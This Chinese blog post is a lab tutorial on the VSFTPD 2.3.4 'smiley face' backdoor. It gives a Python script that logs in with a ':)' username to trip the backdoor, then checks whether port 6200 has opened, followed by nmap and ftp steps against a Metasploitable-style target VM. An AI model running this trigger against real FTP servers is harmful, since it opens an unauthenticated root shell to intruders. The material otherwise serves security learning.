python脚本检测笑脸漏洞

最新推荐文章于 2025-03-07 15:41:26 发布
最新推荐文章于 2025-03-07 15:41:26 发布
阅读量535 收藏 12
点赞数 9
CC 4.0 BY-SA版权
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iii59/article/details/143314882

一、漏洞介绍

VSFTPD 2.3.4,俗称笑脸漏洞。在VSFTPD的实现代码中存在一个后门函数,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。

二、脚本创建

查询资料获得代码如下:

import socket
from ftplib import FTP

url = input("请输入你需要检测的地址:")
ftp = FTP()
username = 'user:)'  # 用户名必须包含:)这两个字符
password = 'abc'
try:
    ftp.connect(url, 21, timeout=6)  # 使用ftp登录,设置延时6秒
    ftp.login(username, password)
    ftp.quit()
except:
    print("完成登录检测")
try:
    s = socket.socket()  # 使用socket函数来检测是否有漏洞存在
    s.connect((url, 6200))
    s.close()
    print("存在微笑漏洞")
except:
    print("没有笑脸漏洞!")

然后将1.py复制到kali桌面

三、打开虚拟机

得到kali的ip地址

然后输入nmap -sV 192.168.48.0/24扫描靶机ip

得到靶机ip为192.168.245.132

输入nmap -p 6200 靶机IP检查端口开放情况

可以看到6200端口未开放

如果端口未开放则输入ftp 目标ip 用户名随便输但后面要带:),密码也随便输(不显示)

现在再看看端口开放情况,可以看到6200端口已打开

kali中输入cd Desktop,然后输入python 脚本的文件名和靶机ip即可检测

iii59
关注
编写Python脚本来提高渗透测试效率:用Python进行信息搜集、漏洞扫描和口令猜测
weixin_43263566的博客
05-23 1297
编写Python脚本来提高渗透测试效率:用Python进行信息搜集、漏洞扫描和口令猜测
Python网站漏洞自动检测
2407_86170733的博客
08-12 575
print(f"可能存在 XSS 漏洞: {url + action}")print(f"可能存在 SQL 注入漏洞: {test_url}")print(f"可能存在 CSRF 漏洞: {url}")
Python安全之编写SQL注入漏洞利用脚本(EXP)
gaojian5422的博客
02-28 1714
本例中以靶机DVWA中的盲注为例。
python渗透工具编写学习笔记:9、web漏洞检测与利用脚本
weixin_49511463的博客
12-24 4410
python编写SQL注入、XXS、CSRF、文件包含、上传漏洞检测与利用脚本以及漏洞防护框架
Python脚本检测笑脸漏洞
T_Fire_of_Square的博客
10-23 347
​ vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“😃 ”,密码任意,因此也称为笑脸漏洞
Python脚本检测笑脸漏洞+笑脸漏洞(VSFTPD2.3.4)复现
moshiyum的博客
10-16 319
是一个已知存在漏洞的FTP服务器版本。该漏洞允许通过某种方式向服务器发送恶意代码来开启后门。使用nmap工具,这是我的ip,来进行扫描Metasploitable2的ip。打开kali root模式 输入ipconfig查看自己的ip。首先先安装好Metasploitable2靶机。可以看到21端口版本是VSFTPD2.3.4。在Metasploitable2的环境中,这时候启动我们的脚本检测是否存在笑脸漏洞。这个开放的端口非常多,一看就是测试靶机。用nc命令链接到对应的端口。那同时进行这个漏洞的复现。
利用 Poc Python 脚本检测 Metasploitable2 中的笑脸漏洞
Tom_9471的博客
10-28 610
采用 POC Python 脚本检测 Metasploitable2 中 VSFTPD v2.3.4 存在的笑脸漏洞
Python笑脸漏洞检测
xxx660308201的博客
10-25 537
笑脸漏洞(Smile vulnerability)是开发者在软件中留下的后门漏洞,VSFTPD 2.3.4版本中存在的笑脸漏洞尤为著名,它允许一个未知的入侵者通过特定的用户名和密码组合进入核心代码,从而获取管理员权限。当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞
python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞
m0_61408947的博客
04-17 1058
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。别在网上瞎学了,我最近也做了一些资源的更新,只要你是我的粉丝,这期福利你都可拿走。
Struts2-057漏洞检测python脚本
11-04
Struts2-057检测python脚本,支持命令回显,计算和弹计算器
HACK学习黑帽子Python--漏洞检测脚本快速编写
qq_29437513的博客
11-15 2930
前言: 作为一名白帽,写脚本能快速的在挖洞过程中快速的批量验证。 为了让笔记更有实用性,这里以poc的形式: 01.如何发送HTTP请求 GET型: 01.有表单参数 request.get(url=url,params={}) params可以先用payload={‘username’:‘admin’}先代替 然后 params=payload 02.requests.get(url) POST型: 01.request.post(url,params={}),params同上 02.requests
python脚本之批量提取fofa的漏洞IP
Aesthetic99的博客
03-29 9332
python脚本之批量提取fofa的漏洞IP 前言: 本次python脚本是通过学习小迪师傅的课程学习而来,由于现在的fofa改变域名为fofa.info,所以下文中的python脚本中的一些值是根据目前的fofa网站改写的 脚本:(poc.py) import requests import base64 import time import sys from lxml import etree def fofa_search(search_data, page_data): #search_d
python脚本(渗透测试)
weixin_56537388的博客
09-18 630
通过此脚本,可以爬取edusrc的目标信息,生成目标字典,为下一步开发自动化测试工具做准备。
python漏洞扫描常用的一些参数
m0_65109001的博客
02-27 722
python脚本去做一些简单的自动化
Python语言的漏洞扫描
最新发布
2501_91009399的博客
03-07 381
漏洞扫描是指使用自动化工具对计算机系统、网络或者应用程序进行扫描,检测潜在的安全漏洞漏洞扫描通常是信息安全评估的一部分,可以帮助组织识别并修复安全隐患,从而提升整体的安全性。id="# 组合URL# 发送GET请求# 简单检测:检查响应正文中是否包含特定内容else:在网络安全日益重要的今天,漏洞扫描是保护信息安全的重要手段之一。Python凭借其简单易用的特性,已成为开发漏洞扫描工具的热门选择。
快速编写一款python漏洞批量检测工具
渗透测试研究中心
09-13 769
一、前言 以下列检测脚本示列: import requests import urllib3 import re,string,random from urllib.parse import urljoin import argparse import time import ssl ssl._create_default_https_context = ssl._create...
脚本】利用python检测文件包含漏洞
Yuppie001的博客
06-16 428
【代码】【脚本】利用python检测文件包含漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值